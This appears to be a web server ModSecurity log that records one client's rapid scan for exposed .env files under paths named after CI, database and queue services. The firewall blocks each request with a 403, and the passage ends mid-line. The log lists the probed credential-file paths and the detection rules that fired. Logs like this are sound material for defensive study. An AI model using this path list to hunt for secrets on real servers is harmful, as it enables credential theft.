[Mon May 11 16:33:53.038509 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/actions/.env"] [unique_id "agHo0VV4kyjgo4bQBUhYDgAAAM0"]
[Mon May 11 16:33:53.038763 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/actions/.env"] [unique_id "agHo0VV4kyjgo4bQBUhYDgAAAM0"]
[Mon May 11 16:33:53.202172 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /circleci/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/circleci/.env"] [unique_id "agHo0VV4kyjgo4bQBUhYDwAAAM0"]
[Mon May 11 16:33:53.202554 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/circleci/.env"] [unique_id "agHo0VV4kyjgo4bQBUhYDwAAAM0"]
[Mon May 11 16:33:53.202752 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/circleci/.env"] [unique_id "agHo0VV4kyjgo4bQBUhYDwAAAM0"]
[Mon May 11 16:33:53.203017 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/circleci/.env"] [unique_id "agHo0VV4kyjgo4bQBUhYDwAAAM0"]
[Mon May 11 16:33:53.366234 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /travis/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/travis/.env"] [unique_id "agHo0VV4kyjgo4bQBUhYEQAAAM0"]
[Mon May 11 16:33:53.366608 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/travis/.env"] [unique_id "agHo0VV4kyjgo4bQBUhYEQAAAM0"]
[Mon May 11 16:33:53.366787 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/travis/.env"] [unique_id "agHo0VV4kyjgo4bQBUhYEQAAAM0"]
[Mon May 11 16:33:53.367041 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/travis/.env"] [unique_id "agHo0VV4kyjgo4bQBUhYEQAAAM0"]
[Mon May 11 16:33:53.531061 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /buildkite/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/buildkite/.env"] [unique_id "agHo0VV4kyjgo4bQBUhYEgAAAM0"]
[Mon May 11 16:33:53.531449 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/buildkite/.env"] [unique_id "agHo0VV4kyjgo4bQBUhYEgAAAM0"]
[Mon May 11 16:33:53.531639 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/buildkite/.env"] [unique_id "agHo0VV4kyjgo4bQBUhYEgAAAM0"]
[Mon May 11 16:33:53.531881 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/buildkite/.env"] [unique_id "agHo0VV4kyjgo4bQBUhYEgAAAM0"]
[Mon May 11 16:33:53.697894 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mysql/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/mysql/.env"] [unique_id "agHo0VV4kyjgo4bQBUhYFAAAAM0"]
[Mon May 11 16:33:53.698435 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/mysql/.env"] [unique_id "agHo0VV4kyjgo4bQBUhYFAAAAM0"]
[Mon May 11 16:33:53.698713 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/mysql/.env"] [unique_id "agHo0VV4kyjgo4bQBUhYFAAAAM0"]
[Mon May 11 16:33:53.699027 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/mysql/.env"] [unique_id "agHo0VV4kyjgo4bQBUhYFAAAAM0"]
[Mon May 11 16:33:53.861951 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postgres/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/postgres/.env"] [unique_id "agHo0VV4kyjgo4bQBUhYFgAAAM0"]
[Mon May 11 16:33:53.862336 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/postgres/.env"] [unique_id "agHo0VV4kyjgo4bQBUhYFgAAAM0"]
[Mon May 11 16:33:53.862520 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/postgres/.env"] [unique_id "agHo0VV4kyjgo4bQBUhYFgAAAM0"]
[Mon May 11 16:33:53.862751 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/postgres/.env"] [unique_id "agHo0VV4kyjgo4bQBUhYFgAAAM0"]
[Mon May 11 16:33:54.025765 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mongodb/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/mongodb/.env"] [unique_id "agHo0lV4kyjgo4bQBUhYFwAAAM0"]
[Mon May 11 16:33:54.026147 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/mongodb/.env"] [unique_id "agHo0lV4kyjgo4bQBUhYFwAAAM0"]
[Mon May 11 16:33:54.026368 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/mongodb/.env"] [unique_id "agHo0lV4kyjgo4bQBUhYFwAAAM0"]
[Mon May 11 16:33:54.026608 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/mongodb/.env"] [unique_id "agHo0lV4kyjgo4bQBUhYFwAAAM0"]
[Mon May 11 16:33:54.189541 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /redis/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/redis/.env"] [unique_id "agHo0lV4kyjgo4bQBUhYGAAAAM0"]
[Mon May 11 16:33:54.189914 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/redis/.env"] [unique_id "agHo0lV4kyjgo4bQBUhYGAAAAM0"]
[Mon May 11 16:33:54.190103 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/redis/.env"] [unique_id "agHo0lV4kyjgo4bQBUhYGAAAAM0"]
[Mon May 11 16:33:54.190347 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/redis/.env"] [unique_id "agHo0lV4kyjgo4bQBUhYGAAAAM0"]
[Mon May 11 16:33:54.354164 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /elasticsearch/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/elasticsearch/.env"] [unique_id "agHo0lV4kyjgo4bQBUhYGgAAAM0"]
[Mon May 11 16:33:54.354538 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/elasticsearch/.env"] [unique_id "agHo0lV4kyjgo4bQBUhYGgAAAM0"]
[Mon May 11 16:33:54.354720 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/elasticsearch/.env"] [unique_id "agHo0lV4kyjgo4bQBUhYGgAAAM0"]
[Mon May 11 16:33:54.354986 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/elasticsearch/.env"] [unique_id "agHo0lV4kyjgo4bQBUhYGgAAAM0"]
[Mon May 11 16:33:54.517815 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rabbitmq/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/rabbitmq/.env"] [unique_id "agHo0lV4kyjgo4bQBUhYGwAAAM0"]
[Mon May 11 16:33:54.518200 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/rabbitmq/.env"] [unique_id 